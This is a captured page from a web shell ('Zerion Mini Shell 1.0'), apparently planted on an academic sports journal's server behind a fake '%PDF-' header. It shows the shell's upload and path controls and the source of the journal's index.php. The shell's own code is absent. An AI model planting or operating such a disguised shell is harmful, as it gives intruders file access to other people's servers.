%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tojsat/public_html/journals/tojras/pdf/
Upload File :
Create Path :
Current File : /home/tojsat/public_html/journals/tojras/pdf/index.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>The Online Journal of Recreation and Sport</title>

<!-- css -->
<link rel="stylesheet" type="text/css" href="css/global.css"/>

	
</head>
<body class="sub">

<!-- container -->
<div id="container">

	<!-- header -->
	<div id="header" class="sub">
	
		<!-- logo -->
		<div id="logo">
			<a href="index.php">
            <img src="images/logo.png" alt="Home Page " /></a>



		</div>
	  
    
    
		<!-- navigation -->
        
         <?php 
        include_once("links.php"); 
        ?>
        
		
		
		<!-- title -->
		
	</div>
	
	<!-- content -->
	<div id="main">

	
		<!-- content -->
		<div id="contentPrimary" class="blank">
			<h2 class="heading">Welcome to TOJRAS</h2>
			
			<h2><strong>Message from the Editors</strong></h2>
            
<p> <?php 
include("settings.php");		 
 //Retrieves data from MySQL 
 $data = mysql_query("SELECT * FROM volume_issue WHERE (current='1' and journal_id=$journal_id) ") or die(mysql_error()); 
 //Puts it into an array 
 while($info = mysql_fetch_array( $data )) 
 { 
 ?>
 <p>
<?php echo $info['message_editor_incheif'] ?> 
</p>
<p><strong><?php echo $info['month'] ?>, <?php echo $info['year'] ?><br />
  Prof. Dr. Erdal  ZORBA                                         </strong><br />
  Editor in Chief           <strong></strong></p>
<p>&nbsp;</p>
<p><?php echo $info['message_editors'] ?> </p>
<p><strong>><?php echo $info['month'] ?>, <?php echo $info['year'] ?><br />
  Assoc. Prof.  Dr. İsmail Hakkı MİRİCİ </strong><br />
  Editor  <strong></strong></p>
   
  <?php 
 }
 ?>
 
  
<h3>&nbsp;</h3>
	  </div>
		<!-- end content -->
		
		<!-- right -->
		<div id="rightMenu">
		<?php 
		include_once("right.php"); 
		?>
			<!-- our services -->
			
		</div>
	</div><!-- end content wrapper -->
	
	<!-- footer -->
	<div id="footer">
		
		<!-- copyright -->
		<div id="copyright">
			
<?php 
		include_once("copyright.php"); 
		?>
		</div>
	</div><!-- end footer -->
</div><!-- end container -->

</body>
</html>

Zerion Mini Shell 1.0